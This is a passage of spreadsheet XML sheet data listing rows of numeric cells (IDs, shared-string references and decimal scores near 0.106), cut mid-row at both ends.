        <v>2.9229763E7</v>
      </c>
      <c r="C29088" s="2" t="s">
        <v>27964</v>
      </c>
      <c r="D29088" s="2">
        <v>1.0</v>
      </c>
      <c r="E29088" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29088" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="29089" ht="15.75" customHeight="1">
      <c r="A29089" s="1">
        <v>7030.0</v>
      </c>
      <c r="B29089" s="2">
        <v>5.0115682E7</v>
      </c>
      <c r="C29089" s="2" t="s">
        <v>27965</v>
      </c>
      <c r="D29089" s="2">
        <v>1.0</v>
      </c>
      <c r="E29089" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29089" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="29090" ht="15.75" customHeight="1">
      <c r="A29090" s="1">
        <v>7586.0</v>
      </c>
      <c r="B29090" s="2">
        <v>5.1594773E7</v>
      </c>
      <c r="C29090" s="2" t="s">
        <v>27966</v>
      </c>
      <c r="D29090" s="2">
        <v>1.0</v>
      </c>
      <c r="E29090" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29090" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="29091" ht="15.75" customHeight="1">
      <c r="A29091" s="1">
        <v>25098.0</v>
      </c>
      <c r="B29091" s="2">
        <v>1.2941006E7</v>
      </c>
      <c r="C29091" s="2" t="s">
        <v>27967</v>
      </c>
      <c r="D29091" s="2">
        <v>1.0</v>
      </c>
      <c r="E29091" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29091" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="29092" ht="15.75" customHeight="1">
      <c r="A29092" s="1">
        <v>10025.0</v>
      </c>
      <c r="B29092" s="2">
        <v>5.7052515E7</v>
      </c>
      <c r="C29092" s="2" t="s">
        <v>27968</v>
      </c>
      <c r="D29092" s="2">
        <v>1.0</v>
      </c>
      <c r="E29092" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29092" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29093" ht="15.75" customHeight="1">
      <c r="A29093" s="1">
        <v>22011.0</v>
      </c>
      <c r="B29093" s="2">
        <v>2.9863737E7</v>
      </c>
      <c r="C29093" s="2" t="s">
        <v>27969</v>
      </c>
      <c r="D29093" s="2">
        <v>1.0</v>
      </c>
      <c r="E29093" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29093" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29094" ht="15.75" customHeight="1">
      <c r="A29094" s="1">
        <v>22254.0</v>
      </c>
      <c r="B29094" s="2">
        <v>3.2806364E7</v>
      </c>
      <c r="C29094" s="2" t="s">
        <v>27970</v>
      </c>
      <c r="D29094" s="2">
        <v>1.0</v>
      </c>
      <c r="E29094" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29094" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29095" ht="15.75" customHeight="1">
      <c r="A29095" s="1">
        <v>22650.0</v>
      </c>
      <c r="B29095" s="2">
        <v>4.0971312E7</v>
      </c>
      <c r="C29095" s="2" t="s">
        <v>27971</v>
      </c>
      <c r="D29095" s="2">
        <v>1.0</v>
      </c>
      <c r="E29095" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29095" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29096" ht="15.75" customHeight="1">
      <c r="A29096" s="1">
        <v>23484.0</v>
      </c>
      <c r="B29096" s="2">
        <v>5735095.0</v>
      </c>
      <c r="C29096" s="2" t="s">
        <v>27972</v>
      </c>
      <c r="D29096" s="2">
        <v>1.0</v>
      </c>
      <c r="E29096" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29096" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29097" ht="15.75" customHeight="1">
      <c r="A29097" s="1">
        <v>23730.0</v>
      </c>
      <c r="B29097" s="2">
        <v>7264560.0</v>
      </c>
      <c r="C29097" s="2" t="s">
        <v>27973</v>
      </c>
      <c r="D29097" s="2">
        <v>1.0</v>
      </c>
      <c r="E29097" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29097" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29098" ht="15.75" customHeight="1">
      <c r="A29098" s="1">
        <v>23802.0</v>
      </c>
      <c r="B29098" s="2">
        <v>7810383.0</v>
      </c>
      <c r="C29098" s="2" t="s">
        <v>27974</v>
      </c>
      <c r="D29098" s="2">
        <v>1.0</v>
      </c>
      <c r="E29098" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29098" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29099" ht="15.75" customHeight="1">
      <c r="A29099" s="1">
        <v>26253.0</v>
      </c>
      <c r="B29099" s="2">
        <v>1.6339599E7</v>
      </c>
      <c r="C29099" s="2" t="s">
        <v>27975</v>
      </c>
      <c r="D29099" s="2">
        <v>1.0</v>
      </c>
      <c r="E29099" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29099" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29100" ht="15.75" customHeight="1">
      <c r="A29100" s="1">
        <v>28091.0</v>
      </c>
      <c r="B29100" s="2">
        <v>2.4654164E7</v>
      </c>
      <c r="C29100" s="2" t="s">
        <v>27976</v>
      </c>
      <c r="D29100" s="2">
        <v>1.0</v>
      </c>
      <c r="E29100" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29100" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29101" ht="15.75" customHeight="1">
      <c r="A29101" s="1">
        <v>29527.0</v>
      </c>
      <c r="B29101" s="2">
        <v>3.2806363E7</v>
      </c>
      <c r="C29101" s="2" t="s">
        <v>27970</v>
      </c>
      <c r="D29101" s="2">
        <v>1.0</v>
      </c>
      <c r="E29101" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29101" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29102" ht="15.75" customHeight="1">
      <c r="A29102" s="1">
        <v>29814.0</v>
      </c>
      <c r="B29102" s="2">
        <v>3.5202925E7</v>
      </c>
      <c r="C29102" s="2" t="s">
        <v>27977</v>
      </c>
      <c r="D29102" s="2">
        <v>1.0</v>
      </c>
      <c r="E29102" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29102" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29103" ht="15.75" customHeight="1">
      <c r="A29103" s="1">
        <v>30573.0</v>
      </c>
      <c r="B29103" s="2">
        <v>4.0971311E7</v>
      </c>
      <c r="C29103" s="2" t="s">
        <v>27978</v>
      </c>
      <c r="D29103" s="2">
        <v>1.0</v>
      </c>
      <c r="E29103" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29103" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29104" ht="15.75" customHeight="1">
      <c r="A29104" s="1">
        <v>32171.0</v>
      </c>
      <c r="B29104" s="2">
        <v>5462030.0</v>
      </c>
      <c r="C29104" s="2" t="s">
        <v>27979</v>
      </c>
      <c r="D29104" s="2">
        <v>1.0</v>
      </c>
      <c r="E29104" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29104" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29105" ht="15.75" customHeight="1">
      <c r="A29105" s="1">
        <v>34027.0</v>
      </c>
      <c r="B29105" s="2">
        <v>9538014.0</v>
      </c>
      <c r="C29105" s="2" t="s">
        <v>27980</v>
      </c>
      <c r="D29105" s="2">
        <v>1.0</v>
      </c>
      <c r="E29105" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29105" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="29106" ht="15.75" customHeight="1">
      <c r="A29106" s="1">
        <v>17464.0</v>
      </c>
      <c r="B29106" s="2">
        <v>4.9852681E7</v>
      </c>
      <c r="C29106" s="2" t="s">
        <v>27981</v>
      </c>
      <c r="D29106" s="2">
        <v>1.0</v>
      </c>
      <c r="E29106" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29106" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="29107" ht="15.75" customHeight="1">
      <c r="A29107" s="1">
        <v>2899.0</v>
      </c>
      <c r="B29107" s="2">
        <v>3.5728403E7</v>
      </c>
      <c r="C29107" s="2" t="s">
        <v>27982</v>
      </c>
      <c r="D29107" s="2">
        <v>1.0</v>
      </c>
      <c r="E29107" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29107" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="29108" ht="15.75" customHeight="1">
      <c r="A29108" s="1">
        <v>16404.0</v>
      </c>
      <c r="B29108" s="2">
        <v>4.6290137E7</v>
      </c>
      <c r="C29108" s="2" t="s">
        <v>27983</v>
      </c>
      <c r="D29108" s="2">
        <v>1.0</v>
      </c>
      <c r="E29108" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29108" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="29109" ht="15.75" customHeight="1">
      <c r="A29109" s="1">
        <v>22332.0</v>
      </c>
      <c r="B29109" s="2">
        <v>3.4203298E7</v>
      </c>
      <c r="C29109" s="2" t="s">
        <v>27984</v>
      </c>
      <c r="D29109" s="2">
        <v>1.0</v>
      </c>
      <c r="E29109" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29109" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="29110" ht="15.75" customHeight="1">
      <c r="A29110" s="1">
        <v>28810.0</v>
      </c>
      <c r="B29110" s="2">
        <v>2.8669117E7</v>
      </c>
      <c r="C29110" s="2" t="s">
        <v>27985</v>
      </c>
      <c r="D29110" s="2">
        <v>1.0</v>
      </c>
      <c r="E29110" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29110" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="29111" ht="15.75" customHeight="1">
      <c r="A29111" s="1">
        <v>33249.0</v>
      </c>
      <c r="B29111" s="2">
        <v>7337077.0</v>
      </c>
      <c r="C29111" s="2" t="s">
        <v>27986</v>
      </c>
      <c r="D29111" s="2">
        <v>1.0</v>
      </c>
      <c r="E29111" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29111" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="29112" ht="15.75" customHeight="1">
      <c r="A29112" s="1">
        <v>33652.0</v>
      </c>
      <c r="B29112" s="2">
        <v>8398850.0</v>
      </c>
      <c r="C29112" s="2" t="s">
        <v>27987</v>
      </c>
      <c r="D29112" s="2">
        <v>1.0</v>
      </c>
      <c r="E29112" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29112" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="29113" ht="15.75" customHeight="1">
      <c r="A29113" s="1">
        <v>34021.0</v>
      </c>
      <c r="B29113" s="2">
        <v>9512074.0</v>
      </c>
      <c r="C29113" s="2" t="s">
        <v>27988</v>
      </c>
      <c r="D29113" s="2">
        <v>1.0</v>
      </c>
      <c r="E29113" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29113" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="29114" ht="15.75" customHeight="1">
      <c r="A29114" s="1">
        <v>12058.0</v>
      </c>
      <c r="B29114" s="2">
        <v>2.6484776E7</v>
      </c>
      <c r="C29114" s="2" t="s">
        <v>27989</v>
      </c>
      <c r="D29114" s="2">
        <v>1.0</v>
      </c>
      <c r="E29114" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29114" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="29115" ht="15.75" customHeight="1">
      <c r="A29115" s="1">
        <v>16407.0</v>
      </c>
      <c r="B29115" s="2">
        <v>4.6294179E7</v>
      </c>
      <c r="C29115" s="2" t="s">
        <v>27990</v>
      </c>
      <c r="D29115" s="2">
        <v>1.0</v>
      </c>
      <c r="E29115" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29115" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="29116" ht="15.75" customHeight="1">
      <c r="A29116" s="1">
        <v>19585.0</v>
      </c>
      <c r="B29116" s="2">
        <v>5.6158108E7</v>
      </c>
      <c r="C29116" s="2" t="s">
        <v>27991</v>
      </c>
      <c r="D29116" s="2">
        <v>1.0</v>
      </c>
      <c r="E29116" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29116" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="29117" ht="15.75" customHeight="1">
      <c r="A29117" s="1">
        <v>27653.0</v>
      </c>
      <c r="B29117" s="2">
        <v>2.2831547E7</v>
      </c>
      <c r="C29117" s="2" t="s">
        <v>27992</v>
      </c>
      <c r="D29117" s="2">
        <v>1.0</v>
      </c>
      <c r="E29117" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29117" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="29118" ht="15.75" customHeight="1">
      <c r="A29118" s="1">
        <v>28283.0</v>
      </c>
      <c r="B29118" s="2">
        <v>2.5483059E7</v>
      </c>
      <c r="C29118" s="2" t="s">
        <v>27993</v>
      </c>
      <c r="D29118" s="2">
        <v>1.0</v>
      </c>
      <c r="E29118" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29118" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="29119" ht="15.75" customHeight="1">
      <c r="A29119" s="1">
        <v>32292.0</v>
      </c>
      <c r="B29119" s="2">
        <v>5.5473894E7</v>
      </c>
      <c r="C29119" s="2" t="s">
        <v>27994</v>
      </c>
      <c r="D29119" s="2">
        <v>1.0</v>
      </c>
      <c r="E29119" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29119" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="29120" ht="15.75" customHeight="1">
      <c r="A29120" s="1">
        <v>803.0</v>
      </c>
      <c r="B29120" s="2">
        <v>2.1290374E7</v>
      </c>
      <c r="C29120" s="2" t="s">
        <v>27995</v>
      </c>
      <c r="D29120" s="2">
        <v>1.0</v>
      </c>
      <c r="E29120" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29120" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="29121" ht="15.75" customHeight="1">
      <c r="A29121" s="1">
        <v>5440.0</v>
      </c>
      <c r="B29121" s="2">
        <v>4.560216E7</v>
      </c>
      <c r="C29121" s="2" t="s">
        <v>27996</v>
      </c>
      <c r="D29121" s="2">
        <v>1.0</v>
      </c>
      <c r="E29121" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29121" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="29122" ht="15.75" customHeight="1">
      <c r="A29122" s="1">
        <v>9895.0</v>
      </c>
      <c r="B29122" s="2">
        <v>5.6768541E7</v>
      </c>
      <c r="C29122" s="2" t="s">
        <v>27919</v>
      </c>
      <c r="D29122" s="2">
        <v>1.0</v>
      </c>
      <c r="E29122" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29122" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="29123" ht="15.75" customHeight="1">
      <c r="A29123" s="1">
        <v>12612.0</v>
      </c>
      <c r="B29123" s="2">
        <v>3.0163927E7</v>
      </c>
      <c r="C29123" s="2" t="s">
        <v>27997</v>
      </c>
      <c r="D29123" s="2">
        <v>1.0</v>
      </c>
      <c r="E29123" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29123" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="29124" ht="15.75" customHeight="1">
      <c r="A29124" s="1">
        <v>14165.0</v>
      </c>
      <c r="B29124" s="2">
        <v>3.8029084E7</v>
      </c>
      <c r="C29124" s="5" t="s">
        <v>27998</v>
      </c>
      <c r="D29124" s="2">
        <v>1.0</v>
      </c>
      <c r="E29124" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29124" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="29125" ht="15.75" customHeight="1">
      <c r="A29125" s="1">
        <v>15450.0</v>
      </c>
      <c r="B29125" s="2">
        <v>4.3041595E7</v>
      </c>
      <c r="C29125" s="2" t="s">
        <v>27999</v>
      </c>
      <c r="D29125" s="2">
        <v>1.0</v>
      </c>
      <c r="E29125" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29125" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="29126" ht="15.75" customHeight="1">
      <c r="A29126" s="1">
        <v>18501.0</v>
      </c>
      <c r="B29126" s="2">
        <v>5.2950121E7</v>
      </c>
      <c r="C29126" s="2" t="s">
        <v>28000</v>
      </c>
      <c r="D29126" s="2">
        <v>1.0</v>
      </c>
      <c r="E29126" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29126" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="29127" ht="15.75" customHeight="1">
      <c r="A29127" s="1">
        <v>23030.0</v>
      </c>
      <c r="B29127" s="2">
        <v>5.0035229E7</v>
      </c>
      <c r="C29127" s="2" t="s">
        <v>28001</v>
      </c>
      <c r="D29127" s="2">
        <v>1.0</v>
      </c>
      <c r="E29127" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29127" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="29128" ht="15.75" customHeight="1">
      <c r="A29128" s="1">
        <v>23584.0</v>
      </c>
      <c r="B29128" s="2">
        <v>6272049.0</v>
      </c>
      <c r="C29128" s="2" t="s">
        <v>28002</v>
      </c>
      <c r="D29128" s="2">
        <v>1.0</v>
      </c>
      <c r="E29128" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29128" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="29129" ht="15.75" customHeight="1">
      <c r="A29129" s="1">
        <v>30220.0</v>
      </c>
      <c r="B29129" s="2">
        <v>3.740005E7</v>
      </c>
      <c r="C29129" s="2" t="s">
        <v>28003</v>
      </c>
      <c r="D29129" s="2">
        <v>1.0</v>
      </c>
      <c r="E29129" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29129" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="29130" ht="15.75" customHeight="1">
      <c r="A29130" s="1">
        <v>33685.0</v>
      </c>
      <c r="B29130" s="2">
        <v>8442840.0</v>
      </c>
      <c r="C29130" s="2" t="s">
        <v>28004</v>
      </c>
      <c r="D29130" s="2">
        <v>1.0</v>
      </c>
      <c r="E29130" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29130" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="29131" ht="15.75" customHeight="1">
      <c r="A29131" s="1">
        <v>34155.0</v>
      </c>
      <c r="B29131" s="2">
        <v>9866204.0</v>
      </c>
      <c r="C29131" s="2" t="s">
        <v>28005</v>
      </c>
      <c r="D29131" s="2">
        <v>1.0</v>
      </c>
      <c r="E29131" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29131" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="29132" ht="15.75" customHeight="1">
      <c r="A29132" s="1">
        <v>3402.0</v>
      </c>
      <c r="B29132" s="2">
        <v>3.803097E7</v>
      </c>
      <c r="C29132" s="2" t="s">
        <v>28006</v>
      </c>
      <c r="D29132" s="2">
        <v>1.0</v>
      </c>
      <c r="E29132" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29132" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29133" ht="15.75" customHeight="1">
      <c r="A29133" s="1">
        <v>4834.0</v>
      </c>
      <c r="B29133" s="2">
        <v>4.3664092E7</v>
      </c>
      <c r="C29133" s="2" t="s">
        <v>28007</v>
      </c>
      <c r="D29133" s="2">
        <v>1.0</v>
      </c>
      <c r="E29133" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29133" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29134" ht="15.75" customHeight="1">
      <c r="A29134" s="1">
        <v>6859.0</v>
      </c>
      <c r="B29134" s="2">
        <v>4.9674563E7</v>
      </c>
      <c r="C29134" s="2" t="s">
        <v>28008</v>
      </c>
      <c r="D29134" s="2">
        <v>1.0</v>
      </c>
      <c r="E29134" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29134" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29135" ht="15.75" customHeight="1">
      <c r="A29135" s="1">
        <v>8190.0</v>
      </c>
      <c r="B29135" s="2">
        <v>5.3252741E7</v>
      </c>
      <c r="C29135" s="2" t="s">
        <v>28009</v>
      </c>
      <c r="D29135" s="2">
        <v>1.0</v>
      </c>
      <c r="E29135" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29135" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29136" ht="15.75" customHeight="1">
      <c r="A29136" s="1">
        <v>8236.0</v>
      </c>
      <c r="B29136" s="2">
        <v>5335551.0</v>
      </c>
      <c r="C29136" s="2" t="s">
        <v>28010</v>
      </c>
      <c r="D29136" s="2">
        <v>1.0</v>
      </c>
      <c r="E29136" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29136" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29137" ht="15.75" customHeight="1">
      <c r="A29137" s="1">
        <v>8948.0</v>
      </c>
      <c r="B29137" s="2">
        <v>5.4913103E7</v>
      </c>
      <c r="C29137" s="2" t="s">
        <v>28011</v>
      </c>
      <c r="D29137" s="2">
        <v>1.0</v>
      </c>
      <c r="E29137" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29137" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29138" ht="15.75" customHeight="1">
      <c r="A29138" s="1">
        <v>11197.0</v>
      </c>
      <c r="B29138" s="2">
        <v>1.9888842E7</v>
      </c>
      <c r="C29138" s="2" t="s">
        <v>28012</v>
      </c>
      <c r="D29138" s="2">
        <v>1.0</v>
      </c>
      <c r="E29138" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29138" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29139" ht="15.75" customHeight="1">
      <c r="A29139" s="1">
        <v>12069.0</v>
      </c>
      <c r="B29139" s="2">
        <v>2.661134E7</v>
      </c>
      <c r="C29139" s="2" t="s">
        <v>28013</v>
      </c>
      <c r="D29139" s="2">
        <v>1.0</v>
      </c>
      <c r="E29139" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29139" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29140" ht="15.75" customHeight="1">
      <c r="A29140" s="1">
        <v>16299.0</v>
      </c>
      <c r="B29140" s="2">
        <v>4.5901657E7</v>
      </c>
      <c r="C29140" s="2" t="s">
        <v>28014</v>
      </c>
      <c r="D29140" s="2">
        <v>1.0</v>
      </c>
      <c r="E29140" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29140" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29141" ht="15.75" customHeight="1">
      <c r="A29141" s="1">
        <v>19175.0</v>
      </c>
      <c r="B29141" s="2">
        <v>5.4971322E7</v>
      </c>
      <c r="C29141" s="2" t="s">
        <v>28015</v>
      </c>
      <c r="D29141" s="2">
        <v>1.0</v>
      </c>
      <c r="E29141" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29141" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29142" ht="15.75" customHeight="1">
      <c r="A29142" s="1">
        <v>20300.0</v>
      </c>
      <c r="B29142" s="2">
        <v>1.1316654E7</v>
      </c>
      <c r="C29142" s="2" t="s">
        <v>28016</v>
      </c>
      <c r="D29142" s="2">
        <v>1.0</v>
      </c>
      <c r="E29142" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29142" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29143" ht="15.75" customHeight="1">
      <c r="A29143" s="1">
        <v>21315.0</v>
      </c>
      <c r="B29143" s="2">
        <v>2.0857365E7</v>
      </c>
      <c r="C29143" s="2" t="s">
        <v>28017</v>
      </c>
      <c r="D29143" s="2">
        <v>1.0</v>
      </c>
      <c r="E29143" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29143" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29144" ht="15.75" customHeight="1">
      <c r="A29144" s="1">
        <v>22224.0</v>
      </c>
      <c r="B29144" s="2">
        <v>3.2314086E7</v>
      </c>
      <c r="C29144" s="2" t="s">
        <v>28018</v>
      </c>
      <c r="D29144" s="2">
        <v>1.0</v>
      </c>
      <c r="E29144" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29144" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29145" ht="15.75" customHeight="1">
      <c r="A29145" s="1">
        <v>24784.0</v>
      </c>
      <c r="B29145" s="2">
        <v>1.1934346E7</v>
      </c>
      <c r="C29145" s="2" t="s">
        <v>28019</v>
      </c>
      <c r="D29145" s="2">
        <v>1.0</v>
      </c>
      <c r="E29145" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29145" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29146" ht="15.75" customHeight="1">
      <c r="A29146" s="1">
        <v>28116.0</v>
      </c>
      <c r="B29146" s="2">
        <v>2.4665696E7</v>
      </c>
      <c r="C29146" s="2" t="s">
        <v>28020</v>
      </c>
      <c r="D29146" s="2">
        <v>1.0</v>
      </c>
      <c r="E29146" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29146" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29147" ht="15.75" customHeight="1">
      <c r="A29147" s="1">
        <v>29494.0</v>
      </c>
      <c r="B29147" s="2">
        <v>3.2627179E7</v>
      </c>
      <c r="C29147" s="2" t="s">
        <v>28021</v>
      </c>
      <c r="D29147" s="2">
        <v>1.0</v>
      </c>
      <c r="E29147" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29147" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29148" ht="15.75" customHeight="1">
      <c r="A29148" s="1">
        <v>29706.0</v>
      </c>
      <c r="B29148" s="2">
        <v>3.4377877E7</v>
      </c>
      <c r="C29148" s="2" t="s">
        <v>28022</v>
      </c>
      <c r="D29148" s="2">
        <v>1.0</v>
      </c>
      <c r="E29148" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29148" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29149" ht="15.75" customHeight="1">
      <c r="A29149" s="1">
        <v>33737.0</v>
      </c>
      <c r="B29149" s="2">
        <v>8549400.0</v>
      </c>
      <c r="C29149" s="2" t="s">
        <v>28023</v>
      </c>
      <c r="D29149" s="2">
        <v>1.0</v>
      </c>
      <c r="E29149" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29149" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="29150" ht="15.75" customHeight="1">
      <c r="A29150" s="1">
        <v>2661.0</v>
      </c>
      <c r="B29150" s="2">
        <v>3.4705213E7</v>
      </c>
      <c r="C29150" s="2" t="s">
        <v>28024</v>
      </c>
      <c r="D29150" s="2">
        <v>1.0</v>
      </c>
      <c r="E29150" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29150" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="29151" ht="15.75" customHeight="1">
      <c r="A29151" s="1">
        <v>6523.0</v>
      </c>
      <c r="B29151" s="2">
        <v>4.8805683E7</v>
      </c>
      <c r="C29151" s="2" t="s">
        <v>28025</v>
      </c>
      <c r="D29151" s="2">
        <v>1.0</v>
      </c>
      <c r="E29151" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29151" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="29152" ht="15.75" customHeight="1">
      <c r="A29152" s="1">
        <v>12198.0</v>
      </c>
      <c r="B29152" s="2">
        <v>2.7500507E7</v>
      </c>
      <c r="C29152" s="2" t="s">
        <v>28026</v>
      </c>
      <c r="D29152" s="2">
        <v>1.0</v>
      </c>
      <c r="E29152" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29152" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="29153" ht="15.75" customHeight="1">
      <c r="A29153" s="1">
        <v>16403.0</v>
      </c>
      <c r="B29153" s="2">
        <v>4.6286964E7</v>
      </c>
      <c r="C29153" s="2" t="s">
        <v>28027</v>
      </c>
      <c r="D29153" s="2">
        <v>1.0</v>
      </c>
      <c r="E29153" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29153" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="29154" ht="15.75" customHeight="1">
      <c r="A29154" s="1">
        <v>24680.0</v>
      </c>
      <c r="B29154" s="2">
        <v>1.1598534E7</v>
      </c>
      <c r="C29154" s="2" t="s">
        <v>28028</v>
      </c>
      <c r="D29154" s="2">
        <v>1.0</v>
      </c>
      <c r="E29154" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29154" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="29155" ht="15.75" customHeight="1">
      <c r="A29155" s="1">
        <v>32403.0</v>
      </c>
      <c r="B29155" s="2">
        <v>5.6279883E7</v>
      </c>
